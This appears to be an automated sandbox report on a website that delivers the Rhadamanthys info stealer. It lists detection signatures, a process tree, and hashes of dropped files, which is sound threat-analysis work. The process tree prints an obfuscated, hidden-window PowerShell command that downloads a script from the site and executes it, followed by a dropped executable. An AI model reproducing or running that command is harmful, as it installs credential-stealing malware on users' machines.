Analysis
-
max time kernel
327s -
max time network
332s -
platform
windows10-ltsc_2021_x64 -
resource
win10ltsc2021-20250314-en -
resource tags
-
submitted
27/03/2025, 23:06
General
-
Target
https://ypp-studio.com/
Malware Config
Signatures
-
Detects Rhadamanthys payload 2 IoCs
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Rhadamanthys family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Blocklisted process makes network request 2 IoCs
-
Downloads MZ/PE file 1 IoCs
-
Executes dropped EXE 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
Drops file in System32 directory 1 IoCs
-
Drops file in Windows directory 38 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 2 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of FindShellTrayWindow 26 IoCs
-
Suspicious use of SendNotifyMessage 24 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵
-
C:\Windows\System32\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://ypp-studio.com/1⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x264,0x268,0x26c,0x260,0x2d4,0x7ffb6c01f208,0x7ffb6c01f214,0x7ffb6c01f2202⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2228,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=2224 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1956,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=2288 /prefetch:32⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2528,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=2544 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3508,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=3552 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=1876,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=3600 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4268,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=4296 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4312,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=4356 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3728,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=5260 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5424,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=5436 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5444,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=5112 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5440,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=5616 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5868,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=5884 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5868,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=5884 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6016,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=6048 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6028,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=5992 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6232,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=4632 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6200,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=6052 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6612,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=6624 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6648,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=6688 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6204,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=6840 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6240,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=6812 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=604,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=6672 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6712,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=6656 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6772,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=4388 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5632,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=4640 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5312,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=5548 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5468,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=6688 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=812,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=6140 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4560,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=4572 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=6676,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=6104 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6176,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=3220 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6468,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=6056 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5716,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=6636 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5928,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=3592 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=2752,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=3588 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=1340,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=5700 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=2704,i,15478678535979351058,118129125812202247,262144 --variations-seed-version --mojo-platform-channel-handle=5308 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵
-
C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h iex 'c##ur##l ##h####tt#ps##:#//yp#p-s####t#udi#o####.co####m/####u###pda####te.tx###t| ####ie###x##'.replace('#','')1⤵
- Blocklisted process makes network request
- Downloads MZ/PE file
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\rh_0.9.0.exe"C:\Users\Admin\AppData\Roaming\rh_0.9.0.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
280B
MD5a46a324553367dc0b13a007305e4f102
SHA1005a700ac0bf4429024f9e857e2281f82f370aed
SHA256a718f2fe90be4422382450b4959840a13d6d18dea09d3da5394624198a126063
SHA512d3b9fcde15be13451aa441070d9143fc53faa6a2725adea7fb9c340bcb9d7ea183dc1b36c0f8ec21c1748c80bc8fa03a14f198c2fc914c9f8e81702bd8e18399
-
Filesize
280B
MD529f13140c50c2394177caf96baf3a5c0
SHA1680e35060382a846752eb208b62de077d31fd1eb
SHA256f4554eb3e1e133edb5f5f01e19539ffc52adc0b346e19c4742a815e7a92b2dcb
SHA512d964d066a2913d3b6eb73925160d7e9d79a94ae5c6e3956cd361b54fe53833b311990a91346917bc90b227301d864939f6a5a417ff52ef9fe8e21971b1a661fc
-
Filesize
7KB
MD595c88be9c5e1db68af5e153b95cd5dc7
SHA1a74f4cd8a98d7bb7a1525fce18fa35ff128a66e3
SHA25693cb8632f85c2b2733814f63014378add4c07b898089a862e04f842bdc4af0e1
SHA512f64a700efca6a5ffd71ecd3aa98f29b680b80d6f728516b0cfd2f2061f36ec25835cc287b92904bb1134f04033ae773a558873f0e389f6be3bfa8366c57841fa
-
Filesize
158B
MD57ebfae747a74a3fa776aac4d16a54157
SHA1b79264338c23136c029dda9f3a49c63c49a8c849
SHA2560139e6c786802bc0847c88bf6349739b64976ea69800ce443d14caf40cdceaba
SHA51224f40cbc7209c784199e525f78dbb4bb4e481df9eeb6a9e6d8c15b3f1b8edb6e23c123a84aa58ed9d5278637bde6d096b8c9ddebd3670c2d570e1fb3c5e8ad40
-
Filesize
3KB
MD53a3ecf6bec876ed98b457cf03fb5be7f
SHA1322f6f6c13fa04654863cf93bdc9342119619e1f
SHA25659832af8c0be572847e88712ec56820d24353ac0acd280b8077c9cc33e9d2abd
SHA512be300c46ed06f33779c335390a79565cd7e5abc2f2101c346d4d4eb29da3cdeb8e15cd1f7400759bcbe412bf4b6a6090c4f0793ed685b0f2f543fb70dbe51972
-
Filesize
3KB
MD545303666684b9b68b5663bbef6dffff6
SHA13cbd28ad812bc051257630e2a23df52095dc82ec
SHA256777a7a48603944a4097927732ec23c9f308e2a90f9c609b42fd8c2d39677c3ad
SHA512508025b8aea8ff5550f5aa75decc59918c1eb53b41f2e984d84ab1231363b009f268b1c7cb468eb6ddddfba3849ac14065095299c637c3abc8a5bf05fbb0653d
-
Filesize
2B
MD599914b932bd37a50b983c5e7c90ae93b
SHA1bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA25644136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA51227c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd
-
Filesize
69KB
MD5164a788f50529fc93a6077e50675c617
SHA1c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48
SHA256b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17
SHA512ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4
-
Filesize
9KB
MD53d20584f7f6c8eac79e17cca4207fb79
SHA13c16dcc27ae52431c8cdd92fbaab0341524d3092
SHA2560d40a5153cb66b5bde64906ca3ae750494098f68ad0b4d091256939eea243643
SHA512315d1b4cc2e70c72d7eb7d51e0f304f6e64ac13ae301fd2e46d585243a6c936b2ad35a0964745d291ae9b317c316a29760b9b9782c88cc6a68599db531f87d59
-
Filesize
107KB
MD540e2018187b61af5be8caf035fb72882
SHA172a0b7bcb454b6b727bf90da35879b3e9a70621e
SHA256b3efd9d75856016510dd0bdb5e22359925cee7f2056b3cde6411c55ae8ae8ee5
SHA512a21b8f3f7d646909d6aed605ad5823269f52fda1255aa9bb4d4643e165a7b11935572bf9e0a6a324874f99c20a6f3b6d1e457c7ccd30adcac83c15febc063d12
-
Filesize
2KB
MD584b89dac7e80a7569381fb91c172176c
SHA1ea3805243ef3968b4762753e32fe268bc13cfc28
SHA2563dc9e9de65c18f4228f3c19faffaec6453489c67f879761d32d0cc1e55bf780b
SHA512aa79e8d2a5f7c2eedc6f47781d5722f4576751a0e6f82b089b6b33c7e9f1350329752adac6384e56061e0d4b6bd945bfb2fea87f41a3a7a01c1e8bec4ac26d1b
-
Filesize
2KB
MD57dd75a8675b19f872ff6dbabfcc56100
SHA174b4a123d5e22e15627b677d4c8b4383c1c14ad5
SHA2562a7f414bc7eda1cf6a93b0a256ee612021be0eb13af45f55812243d7229b23b0
SHA51258bbb2055f5133358ecf5abca5064da7c5ab15b76abe0d93c5c754ba1fc597a8365f5ef08a4e9ac581419795b7781d9e1928764d7fac17cc53cc2269be0241db
-
Filesize
111B
MD5285252a2f6327d41eab203dc2f402c67
SHA1acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA2565dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA51211ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
14KB
MD578580446909d77b6537dd134955c6b19
SHA173d54d43c01d5f69a42e74cb3012155d7acb71ae
SHA256e0eaa845418fda5175134dc655417145c22fb29aa273d1f7de48958e4b40fb5f
SHA5128318b0305655f28a9d8f518f4672620ea98e6b8ee3e83b46d37374c72295e0473a8cca0c32610ed6a53de144b54b95743e731ad6711a2ce0a8e628b1254b8414
-
Filesize
14KB
MD5ce76a7e6c94c00860a64924cc7b17389
SHA1e429b91f05b55f56b722fb715afa216887b166eb
SHA256a2eb4e1ef85bbfaed91dfadd5772103ae8a25250e7e79979233f065e0a24e8c7
SHA512d301286816a481a0c231cfddb5538780055cac3bd7513f745385fade9a4152aa714817c21d1397b43b2e5f7532224cf8839cd581a20d56283eeaa4a6f0ea90a3
-
Filesize
14KB
MD546591ba11fc8d285742ba4e3cf020dad
SHA1b115fbc8b21b71c6716a4930499d3e7ca731888e
SHA25654177428769a8a5238821a09b91951dc0ad1bc1c095bd71c449f036626201eb8
SHA51264a27449d12216b7f5318f22fd76c661383e2612c49dc4026bf7efa5c6e32d73ee9b1a753e51adc7c698f83e87afb1f74cdf2206f8a2242deda4733912ad0ce2
-
Filesize
480B
MD589744f03aa216c05a1879d0bc4dd4d5e
SHA167bb9c8b5633bca81d893c2d81764384472dc8d9
SHA2565812ed93d83a30981d5eb8c1075e501482bbd83ff8027900548a36026d6847d9
SHA5124a6169b68d5d99e45ddb21f9f24e54b9b987df511151c10ee057d9cef4464b7244c9e4d55e62ddf56f7c4248c4547f99c2c7d3f06188dc88ce8e0983e8dff1b6
-
Filesize
480B
MD5ed9deae12e373c95eac6bc380a75d069
SHA1d0f9e6ede76eeba790cf2fb14cd01e749bd0da28
SHA256c36b7b131948a6c522576a2ae8a9fdb0038f2a31db06fa07cb76aca93b7c0806
SHA51210178066302c854c8b2668b77da323ad9fbf468bfb6a0a9e4c89faeeee256c0197d7648b09ef5a6a602483bea8a9eb8acdf783a88415fc352766661ec7da072e
-
Filesize
253B
MD5437d32338c1a244541c6deb809b20849
SHA1b5d889cfe29a90fa042ff54d460c6994b6a83f8a
SHA2560cb9bac3c7d7dcf0a40b9fb9180bed5d0140d7011c13cc3cfe5112de495410fa
SHA51259d5b8950116d8340c16646dd99ee42d8bd9fd3bbc7eaacf99efebc3a827124eebadc153c3ee29158810bb7d6c189e9d2028464f94b366de2116141f07a54360
-
Filesize
4KB
MD590ffa063ca25372c546236eec458b125
SHA1f267ad83e0df0157e69617c1dd3db3966e4d3618
SHA2560abb442b44028786bef16d9e7147c995550cb490f25f337e2d232e3ff15723f8
SHA512d65a2dd56116e78c70abbf802540d937a5a6e7d720dbb86d378aeb9c475dcd0c32becc3d39e3f7d73dc41332be7020168b962712867d00dd335a91f33eaa9c6b
-
Filesize
36KB
MD57348f874288ef8cb0b359575c84f4f94
SHA1ffe5d4250e2e36512d8539ee613cc240f7fa1b46
SHA2563bb33d09d0e49b95327a2d6672efff019eeba561e83cccd156c648812952abb2
SHA512662b00de8d3288146fbf68e3306c78e19629cdd9dfe83b7c3917e29d2e77fdb67bc62d5a25d360bd0ce18549be62d3892ddb22695320eb424b25e773d7929858
-
Filesize
23KB
MD5b1a57d1d6de578f1885d31d2c2b96c14
SHA14834a4fdf6394e3774069df4ed4d015ff01aab1a
SHA2564d840d0bb48cc6f417f913ef8992f91fabe6c7e33fa581ecd64a5b10bf9ef0f7
